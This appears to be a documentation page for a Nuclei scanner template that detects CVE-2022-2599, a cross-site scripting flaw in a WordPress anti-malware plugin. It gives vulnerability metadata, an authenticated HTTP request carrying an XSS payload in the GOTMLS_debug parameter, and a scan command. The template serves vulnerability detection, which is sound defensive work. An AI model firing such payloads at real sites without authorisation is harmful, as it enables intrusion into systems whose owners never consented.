WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting
ID: CVE-2022-2599
Severity: medium
Author: ritikchaddha
Tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project
Description
Section titled “Description”WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard.
YAML Source
Section titled “YAML Source”id: CVE-2022-2599
info: name: WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting author: ritikchaddha severity: medium description: | WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the targeted WordPress site, potentially leading to unauthorized access, data theft, or further attacks. remediation: | Update the WordPress Anti-Malware Security and Brute-Force Firewall plugin to version 4.21.83 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/276a7fc5-3d0d-446d-92cf-20060aecd0ef - https://wordpress.org/plugins/gotmls/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2599 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2599 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.43227 cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: anti-malware_security_and_brute-force_firewall_project product: anti-malware_security_and_brute-force_firewall framework: wordpress tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "</script><img src onerror=alert(document.domain)>" - "GOTMLS_mt" condition: and
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a00473045022100ddc90f39d66f73703fda8d57208b165bb0e369576946a5e748669d96d2b0939d02204a220f1742328e41def9ca5a77ffc453dd83701a8d40679b69c5d22c85e3c31d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-2599.yaml"